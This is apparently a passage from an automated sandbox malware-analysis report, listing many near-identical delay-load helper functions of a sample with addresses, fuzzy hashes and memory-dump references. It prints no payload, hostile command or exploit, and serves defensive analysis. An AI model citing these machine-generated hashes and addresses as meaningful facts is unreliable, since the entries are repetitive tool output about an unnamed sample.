                                                                                              • Instruction ID: 1f3e72252a68b9ef126da08d7f7c90eb7ec25693f6ea6828aa50cd0d0a0b5213
                                                                                              • Opcode Fuzzy Hash: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
                                                                                              • Instruction Fuzzy Hash: 05B092A1258241AC2544520A2802DBA014DC084F10730C13AB809C02C1E840AC446432
                                                                                              Function 00CBE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                                                              • Instruction ID: 54954f5e521f3fd650e58e2a499e97227397e0f9d3614c87a177ad85bd605138
                                                                                              • Opcode Fuzzy Hash: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                                                              • Instruction Fuzzy Hash: A0B012F125D101BC3504510E2C02DFB014DC0C5F10730C03FFC09C02C1E840ED006472
                                                                                              Function 00CBE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7289e9bad340b3eb004c2ce48671a6b97ee818788a3ae445e4068d1713e5880a
                                                                                              • Instruction ID: 96b8672a44ea0195f5d488eec386b830ba78295d5690a10094bf0eabd5253672
                                                                                              • Opcode Fuzzy Hash: 7289e9bad340b3eb004c2ce48671a6b97ee818788a3ae445e4068d1713e5880a
                                                                                              • Instruction Fuzzy Hash: 7DB012F125C201BC3544510E2C02DFB014DC0C4F10730C13FF809C02C1E841AD406432
                                                                                              Function 00CBE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a6029460613fc59a7bb5410daa6b786540218ec40bf48775ff8587ad732371cc
                                                                                              • Instruction ID: d0da4a94ed9585ad5e155c879b727526d44408580f9e74b1abbc6075d14e166e
                                                                                              • Opcode Fuzzy Hash: a6029460613fc59a7bb5410daa6b786540218ec40bf48775ff8587ad732371cc
                                                                                              • Instruction Fuzzy Hash: F0B012F125C101AC3504510F2C02DFB014DC0C8F10730C03FF909C02C1E840AD006432
                                                                                              Function 00CBE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0092d3bf3a923c2289acc96a2abb10ae370aade00933bbbce28ecdc3e6d636bb
                                                                                              • Instruction ID: 6263cb9c6bc4e36f9fb4e414a75b651aecde06ec2309e417aefc6f57bd8cb8d4
                                                                                              • Opcode Fuzzy Hash: 0092d3bf3a923c2289acc96a2abb10ae370aade00933bbbce28ecdc3e6d636bb
                                                                                              • Instruction Fuzzy Hash: 68B012F125C101AC3504510F2D02EFB014DC0C4F10730C03FF809C02C1EC41AE016432
                                                                                              Function 00CBE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: eaf848348dfc2137704a54981eaa4c1d1dae78f97c7249cc783190bed5ca99d6
                                                                                              • Instruction ID: a90432b13c7424c93c5682f52a0ff4b028aa7b5c51730e6ac29d16b12f26e2ee
                                                                                              • Opcode Fuzzy Hash: eaf848348dfc2137704a54981eaa4c1d1dae78f97c7249cc783190bed5ca99d6
                                                                                              • Instruction Fuzzy Hash: 91B012E1259201BC364492091C42DF7028DC0C0F10730C03FF908C12C0D8408C056473
                                                                                              Function 00CBE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ec3eb3d5fac9df20f233ebaf353321e0e95e9c532313468e3932611c85f2a5c5
                                                                                              • Instruction ID: 1aebba32b57e35b42c4a617d7aa5af8bb5b5a3ed7e08cbd9419f3c4ffbb616c6
                                                                                              • Opcode Fuzzy Hash: ec3eb3d5fac9df20f233ebaf353321e0e95e9c532313468e3932611c85f2a5c5
                                                                                              • Instruction Fuzzy Hash: D9B012E12591017C3644520A1D42DF7028DC0C0F10730C03FF608C12C0D8414C4A6473
                                                                                              Function 00CBE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 260570ea401da8495cdfe103201bb1e6ccd90a4bf4b01532cd27ada055890e16
                                                                                              • Instruction ID: 1a08cfd9f41bc63f900238d380bb0c75f6eb00dbb67a9abd348dd2b01f11b1f7
                                                                                              • Opcode Fuzzy Hash: 260570ea401da8495cdfe103201bb1e6ccd90a4bf4b01532cd27ada055890e16
                                                                                              • Instruction Fuzzy Hash: 93B012F125A001BC364492095C42DF7028DC0C0F10730803FF808C12C0D8408E016473
                                                                                              Function 00CBE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 588b419958b7a016f4b1b47bd0985fc90fd5cf6b88b6ac88977bd929dff0b432
                                                                                              • Instruction ID: 714d708a6f1b474d8ffbee7b70506b231c498eb2700660af27be1e86a23fc8ae
                                                                                              • Opcode Fuzzy Hash: 588b419958b7a016f4b1b47bd0985fc90fd5cf6b88b6ac88977bd929dff0b432
                                                                                              • Instruction Fuzzy Hash: 33B012D12581017E3104935A1C42DF7015DC5C8F14730403FF408C12C0E8404C095432
                                                                                              Function 00CBE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3bc762010cc00b081b6e77f76fca1919d1d9fde1440710bd9877bfdb1b9842d1
                                                                                              • Instruction ID: fe93523e5ec9f3a4486503a58dc9df15b00809a9666c04d2309ded1813ae8cd3
                                                                                              • Opcode Fuzzy Hash: 3bc762010cc00b081b6e77f76fca1919d1d9fde1440710bd9877bfdb1b9842d1
                                                                                              • Instruction Fuzzy Hash: 7DB012D12581017C3104915B5D42DF7417DC4D4F14730423FF408C12C0EC414D065432
                                                                                              Function 00CBE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8ef2b9fbb1f824cdf334ecd015111d2c768f5dbec8d56e41de8a58ce387f6dd1
                                                                                              • Instruction ID: f6c7669dc1415293a4433488169b0e45f67f6fac5ba8c7913c4ae5ede830d6c7
                                                                                              • Opcode Fuzzy Hash: 8ef2b9fbb1f824cdf334ecd015111d2c768f5dbec8d56e41de8a58ce387f6dd1
                                                                                              • Instruction Fuzzy Hash: 4FB012D12582017C3144915A5C47DF7017DC4D4F14730423FF408C12C0E8404C455432
                                                                                              Function 00CBE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 215bb9d9e0bd3cee5e623ae66a816c23f333c558f73a11482b3beb79af7e0d01
                                                                                              • Instruction ID: 15e4632aa908a9ba996890ab619c19e7d4a5340985249459f171fec555edf6bb
                                                                                              • Opcode Fuzzy Hash: 215bb9d9e0bd3cee5e623ae66a816c23f333c558f73a11482b3beb79af7e0d01
                                                                                              • Instruction Fuzzy Hash: 55B012C16D9501BC3204610D5C07DFB014DC0C1F14730833FF508C02C0E8404C495432
                                                                                              Function 00CBE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f1027a1eb4d5e28a100a5d01c42bd13dc65e1ea3aafe6e46e0ae9c0d9ab4d8e3
                                                                                              • Instruction ID: fafa3a465d079c30c29d40b6a3d02ebc307569c83f9581d15f177bb59908ca4e
                                                                                              • Opcode Fuzzy Hash: f1027a1eb4d5e28a100a5d01c42bd13dc65e1ea3aafe6e46e0ae9c0d9ab4d8e3
                                                                                              • Instruction Fuzzy Hash: BAB012C12D9401BC310421291C06DFB010DC0C1F14B30413FF514C05C1A8804D095432
                                                                                              Function 00CBE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9278a8a13005ac555b434f3ea9b7a3c27eb6bc01c060830acc4fa82336037de4
                                                                                              • Instruction ID: 0228ed40fabd33c4f4a8314d532303b2a699ee7af6ff45f610f19da15f12ad78
                                                                                              • Opcode Fuzzy Hash: 9278a8a13005ac555b434f3ea9b7a3c27eb6bc01c060830acc4fa82336037de4
                                                                                              • Instruction Fuzzy Hash: 63B012C12D9442BD3104620E1D02DFB054DC0C1F14730813FF608C02C0E8414C065432
                                                                                              Function 00CBE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
